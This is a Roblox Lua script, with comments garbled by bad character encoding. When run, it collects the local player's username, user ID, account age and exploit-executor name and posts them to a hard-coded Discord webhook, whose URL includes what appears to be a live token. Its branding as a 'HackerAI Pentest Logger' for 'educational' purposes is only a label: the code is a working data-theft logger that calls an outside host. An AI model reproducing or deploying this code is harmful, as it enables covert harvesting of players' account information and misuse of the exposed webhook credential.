-- ุฅุนุฏุงุฏ ุงูุฎุฏูุงุช ุงููุทููุจุฉ
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- ุฑุงุจุท ุงูููุจ ููู ุงูุฎุงุต ุจู (ุงุณุชุฎุฏู ุจุฑููุณู ุฅุฐุง ูุงู ุฏูุณููุฑุฏ ูุญุธูุฑุงู ูู ุจูุฏู ุฃู ูู ุฑูุจูููุณ)
local Webhook_URL = "https://discord.com/api/webhooks/1469720671360909325/sKxPoNz5NvqAVtCSs3TMSreX6qYtHoKbt-I-RNeOMump1n-ed18deVG7mKWB3Ha7xJOC"

-- ุฏุงูุฉ ูุฅุฑุณุงู ุงูุจูุงูุงุช
local function sendImpactData()
    local data = {
        ["username"] = "HackerAI Pentest Logger",
        ["embeds"] = {{
            ["title"] = "๐จ ุชูุฑูุฑ ุงุณุชุฎุฑุงุฌ ุจูุงูุงุช - ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ูุตุฑุญ ุจู",
            ["description"] = "ุชู ุชูููุฐ ุงูุณูุฑุจุช ุจูุฌุงุญ ุนูู ุฌูุงุฒ ุงููุฏู.",
            ["color"] = 16711680, -- ุงูููู ุงูุฃุญูุฑ
            ["fields"] = {
                {
                    ["name"] = "ุงููุงุนุจ (Username)",
                    ["value"] = LocalPlayer.Name,
                    ["inline"] = true
                },
                {
                    ["name"] = "ูุนุฑู ุงูุญุณุงุจ (UserId)",
                    ["value"] = tostring(LocalPlayer.UserId),
                    ["inline"] = true
                },
                {
                    ["name"] = "ุนูุฑ ุงูุญุณุงุจ (Account Age)",
                    ["value"] = tostring(LocalPlayer.AccountAge) .. " ููู",
                    ["inline"] = true
                },
                {
                    ["name"] = "ุฅุตุฏุงุฑ ุงููุดุบู (Executor)",
                    ["value"] = identifyexecutor() or "Unknown",
                    ["inline"] = false
                }
            },
            ["footer"] = {
                ["text"] = "ูุฐุง ุงูุชูุฑูุฑ ูุฃุบุฑุงุถ ุฃูููุฉ ุชุนููููุฉ ููุท."
            },
            ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%SZ")
        }}
    }

    -- ุชุดููุฑ ุงูุจูุงูุงุช ุฅูู JSON
    local jsonData = HttpService:JSONEncode(data)

    -- ูุญุงููุฉ ุฅุฑุณุงู ุงูุทูุจ
    local success, response = pcall(function()
        return HttpService:PostAsync(Webhook_URL, jsonData)
    end)

    if success then
        print("โ ุชู ุฅุฑุณุงู ุงูุจูุงูุงุช ุฅูู ุงูุณูุฑูุฑ ุจูุฌุงุญ.")
    else
        warn("โ ูุดู ุฅุฑุณุงู ุงูุจูุงูุงุช: " .. response)
    end
end

-- ุชุดุบูู ุงูุฏุงูุฉ ููุฑ ุงูุชูููุฐ
sendImpactData()
